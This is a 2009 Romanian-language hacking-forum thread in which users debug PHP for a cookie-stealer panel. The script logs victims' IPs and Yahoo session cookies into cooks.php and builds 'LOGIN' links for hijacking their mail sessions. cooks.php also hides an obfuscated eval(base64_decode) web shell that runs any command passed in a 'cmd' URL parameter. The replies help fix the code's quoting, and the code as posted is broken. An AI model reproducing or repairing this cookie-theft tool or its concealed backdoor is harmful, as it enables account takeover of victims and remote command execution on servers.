paxnWo Posted December 3, 2009 Report Posted December 3, 2009 in lol.php am codul:$rand = rand(0, 10000);$fl = fopen('cooks.php', 'a'); fwrite($fl, "cod aici");fclose($fl);unde scrie "cod aici" am codul:fwrite($fl, "<div> <div id="dhtmlgoodies_control"><a href="#" onclick="slidedown_showHide('box".$rand"');return false;">"IP: "</a></div> <div class="dhtmlgoodies_contentBox" id="box".$rand""> <div class="dhtmlgoodies_content" id="subBox".$rand""> " .$ip. " </div> </div> </div></div><div> <div id="dhtmlgoodies_control"><a href="#" onclick="slidedown_showHide('box".$rand"');return false;">"DATA: "</a></div> <div class="dhtmlgoodies_contentBox" id="box".$rand""> <div class="dhtmlgoodies_content" id="subBox".$rand""> " .$date. " </div> </div> <div></div><div> <div id="dhtmlgoodies_control"><a href="#" onclick="slidedown_showHide('box".$rand."');return false;">".$id."</a> </div> <div class="dhtmlgoodies_contentBox" id="box".$rand""> <div class="dhtmlgoodies_content" id="subBox".$rand""> "<tr><td><a href=\"http://msg.edit.yahoo.com/config/reset_cookies?.y=".$y."&.t=".$t."&.done=http%3A//us.mg1.mail.yahoo.com/ym/login%3Fymv%3D0\" target=\"_blank\"> "LOGIN" </a></td>" </div </div> </div></div> ");( l-am scris asa ca sa vedeti mai bine ; totul pe o singura linie http://alsdhlasdbasld.pastebin.com/m599cc51f )in cooks.php am:<?php$myusername = "xss";$mypassword = "lover";$areaname = "nothin'";if ($_SERVER["PHP_AUTH_USER"] == "" || $_SERVER["PHP_AUTH_PW"] == "" || $_SERVER["PHP_AUTH_USER"] != $myusername || $_SERVER["PHP_AUTH_PW"] != $mypassword) { header("HTTP/1.0 401 Unauthorized"); header("WWW-Authenticate: Basic realm=\"$areaname\""); echo "<h1>jet.</h1>"; die();}eval(base64_decode('aWYoaXNzZXQoJF9HRVRbJ2NtZCddKSl7DQokZG89JF9HRVRbJ2NtZCddOw0Kc3lzdGVtKCRkbyk7IH0='));?><html><head> <style type="text/css"> .dhtmlgoodies_contentBox{ border:1px solid #317082; height:0px; visibility:hidden; position:absolute; background-color:#E2EBED; overflow:hidden; padding:2px; width:250px; } .dhtmlgoodies_content{ position:relative; font-family: Trebuchet MS, Lucida Sans Unicode, Arial, sans-serif; width:100%; font-size:0.8em; } </style> <script type="text/javascript"> var slideDownInitHeight = new Array(); var slidedown_direction = new Array(); var slidedownActive = false; var contentHeight = false; var slidedownSpeed = 3; var slidedownTimer = 7; function slidedown_showHide(boxId) { if(!slidedown_direction[boxId])slidedown_direction[boxId] = 1; if(!slideDownInitHeight[boxId])slideDownInitHeight[boxId] = 0; if(slideDownInitHeight[boxId]==0)slidedown_direction[boxId]=slidedownSpeed; else slidedown_direction[boxId] = slidedownSpeed*-1; slidedownContentBox = document.getElementById(boxId); var subDivs = slidedownContentBox.getElementsByTagName('DIV'); for(var no=0;no<subDivs.length;no++){ if(subDivs[no].className=='dhtmlgoodies_content')slidedownContent = subDivs[no]; } contentHeight = slidedownContent.offsetHeight; slidedownContentBox.style.visibility='visible'; slidedownActive = true; slidedown_showHide_start(slidedownContentBox,slidedownContent); } function slidedown_showHide_start(slidedownContentBox,slidedownContent) { if(!slidedownActive)return; slideDownInitHeight[slidedownContentBox.id] = slideDownInitHeight[slidedownContentBox.id]/1 + slidedown_direction[slidedownContentBox.id]; if(slideDownInitHeight[slidedownContentBox.id] <= 0){ slidedownActive = false; slidedownContentBox.style.visibility='hidden'; slideDownInitHeight[slidedownContentBox.id] = 0; } if(slideDownInitHeight[slidedownContentBox.id]>contentHeight){ slidedownActive = false; } slidedownContentBox.style.height = slideDownInitHeight[slidedownContentBox.id] + 'px'; slidedownContent.style.top = slideDownInitHeight[slidedownContentBox.id] - contentHeight + 'px'; setTimeout('slidedown_showHide_start(document.getElementById("' + slidedownContentBox.id + '"),document.getElementById("' + slidedownContent.id + '"))',slidedownTimer); } function setSlideDownSpeed(newSpeed) { slidedownSpeed = newSpeed; } </script> </head><body bgcolor='black'><script type="text/javascript">setSlideDownSpeed(4);</script>de fiecare data cand se executa lol.php eu vreau ca el sa bage codul respectiv in cooks.php si sa-l afiseze in dropdown ( sursa pentru drop e de aici Dropdown content )ceva gresesc in lol.php ... Quote
Fitty Posted December 3, 2009 Report Posted December 3, 2009 fwrite($fl, "cod aici");in cod aici sa anulezi " sau ' punand \ inaintea lor Quote
ROFL Posted December 4, 2009 Report Posted December 4, 2009 <?php$html = <<<EOF<div> <div id="dhtmlgoodies_control"><a href="#" onclick="slidedown_showHide('box".$rand"');return false;">"IP: "</a></div> <div class="dhtmlgoodies_contentBox" id="box".$rand""> <div class="dhtmlgoodies_content" id="subBox".$rand""> " .$ip. " </div> </div> </div></div><div> <div id="dhtmlgoodies_control"><a href="#" onclick="slidedown_showHide('box".$rand"');return false;">"DATA: "</a></div> <div class="dhtmlgoodies_contentBox" id="box".$rand""> <div class="dhtmlgoodies_content" id="subBox".$rand""> " .$date. " </div> </div> <div></div><div> <div id="dhtmlgoodies_control"><a href="#" onclick="slidedown_showHide('box".$rand."');return false;">".$id."</a> </div> <div class="dhtmlgoodies_contentBox" id="box".$rand""> <div class="dhtmlgoodies_content" id="subBox".$rand""> "<tr><td><a href=\"http://msg.edit.yahoo.com/config/reset_cookies?.y=".$y."&.t=".$t."&.done=http%3A//us.mg1.mail.yahoo.com/ym/login%3Fymv%3D0\" target=\"_blank\"> "LOGIN" </a></td>" </div </div> </div></div>EOF;$rand = rand(0, 10000);$fl = fopen('cooks.php', 'a'); fwrite($fl, $html);fclose($fl);?> Quote